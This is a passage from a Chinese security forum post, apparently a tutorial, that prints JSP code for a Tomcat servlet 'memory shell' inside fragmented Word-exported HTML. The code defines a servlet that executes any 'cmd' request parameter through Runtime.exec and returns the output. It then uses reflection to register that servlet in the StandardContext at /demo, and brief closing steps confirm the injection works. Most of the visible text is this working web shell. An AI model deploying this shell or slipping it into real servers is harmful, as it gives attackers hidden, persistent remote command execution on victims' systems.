  59. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  60. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  61. mso-font-kerning:1.0000pt;">    <font face="Calibri">HttpServlet httpServlet = new HttpServlet() {</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  62. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  63. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  64. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  65. mso-font-kerning:1.0000pt;">      <font face="Calibri">@Override</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  66. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  67. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  68. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  69. mso-font-kerning:1.0000pt;">      <font face="Calibri">protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  70. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  71. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  72. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  73. mso-font-kerning:1.0000pt;">        <font face="Calibri">InputStream is = Runtime.getRuntime().exec(req.getParameter("cmd")).getInputStream();</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  74. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  75. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  76. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  77. mso-font-kerning:1.0000pt;">        <font face="Calibri">BufferedInputStream bis = new BufferedInputStream(is);</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  78. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  79. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  80. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  81. mso-font-kerning:1.0000pt;">        <font face="Calibri">int len;</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  82. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  83. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  84. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  85. mso-font-kerning:1.0000pt;">        <font face="Calibri">while ((len = bis.read())!=-1){</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  86. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  87. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  88. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  89. mso-font-kerning:1.0000pt;">          <font face="Calibri">resp.getWriter().write(len);</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  90. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  91. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  92. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  93. mso-font-kerning:1.0000pt;">        <font face="Calibri">}</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  94. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  95. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  96. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  97. mso-font-kerning:1.0000pt;">      <font face="Calibri">}</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  98. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  99. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  100. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  101. mso-font-kerning:1.0000pt;"> </span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  102. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  103. mso-font-kerning:1.0000pt;">      <font face="Calibri">@Override</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  104. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  105. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  106. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  107. mso-font-kerning:1.0000pt;">      <font face="Calibri">protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  108. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  109. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  110. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  111. mso-font-kerning:1.0000pt;">        <font face="Calibri">super.doPost(req, resp);</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  112. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  113. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  114. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  115. mso-font-kerning:1.0000pt;">      <font face="Calibri">}</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  116. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  117. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  118. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  119. mso-font-kerning:1.0000pt;">    <font face="Calibri">};</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  120. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  121. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  122. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  123. mso-font-kerning:1.0000pt;"> </span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  124. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  125. mso-font-kerning:1.0000pt;">    <font face="Calibri">//</font><font face="宋体">获得</font><font face="Calibri">StandardContext</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  126. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  127. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  128. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  129. mso-font-kerning:1.0000pt;">    <font face="Calibri">Field reqF = request.getClass().getDeclaredField("request");</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  130. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  131. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  132. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  133. mso-font-kerning:1.0000pt;">    <font face="Calibri">reqF.setAccessible(true);</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  134. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  135. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  136. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  137. mso-font-kerning:1.0000pt;">    <font face="Calibri">Request req = (Request) reqF.get(request);</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  138. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  139. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  140. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  141. mso-font-kerning:1.0000pt;">    <font face="Calibri">StandardContext stdcontext = (StandardContext) req.getContext();</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  142. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  143. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  144. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  145. mso-font-kerning:1.0000pt;"> </span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  146. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  147. mso-font-kerning:1.0000pt;">    <font face="Calibri">//</font><font face="宋体">从</font><font face="Calibri">StandardContext.createWapper()</font><font face="宋体">获得一个</font><font face="Calibri">Wapper</font><font face="宋体">对象</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  148. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  149. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  150. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  151. mso-font-kerning:1.0000pt;">    <font face="Calibri">Wrapper newWrapper = stdcontext.createWrapper();</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  152. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  153. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  154. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  155. mso-font-kerning:1.0000pt;">    <font face="Calibri">String name = httpServlet.getClass().getSimpleName();</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  156. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  157. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  158. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  159. mso-font-kerning:1.0000pt;">    <font face="Calibri">newWrapper.setName(name);</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  160. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  161. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  162. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  163. mso-font-kerning:1.0000pt;">    <font face="Calibri">newWrapper.setLoadOnStartup(1);</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  164. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  165. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  166. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  167. mso-font-kerning:1.0000pt;">    <font face="Calibri">newWrapper.setServlet(httpServlet);</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  168. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  169. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  170. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  171. mso-font-kerning:1.0000pt;">    <font face="Calibri">newWrapper.setServletClass(httpServlet.getClass().getName());</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  172. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  173. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  174. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  175. mso-font-kerning:1.0000pt;">    <font face="Calibri">//</font><font face="宋体">将</font><font face="Calibri">Wrapper</font><font face="宋体">添加到</font><font face="Calibri">StandardContext</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  176. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  177. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  178. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  179. mso-font-kerning:1.0000pt;">    <font face="Calibri">stdcontext.addChild(newWrapper);</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  180. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  181. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  182. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  183. mso-font-kerning:1.0000pt;">    <font face="Calibri">stdcontext.addServletMappingDecoded("/demo", name);</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  184. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  185. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  186. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  187. mso-font-kerning:1.0000pt;">  <font face="Calibri">%></font></span></p>
复制代码



直接访问demo发现404

访问index.jsp注入内存马

再次访问demo

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-24 15:40 , Processed in 0.015031 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表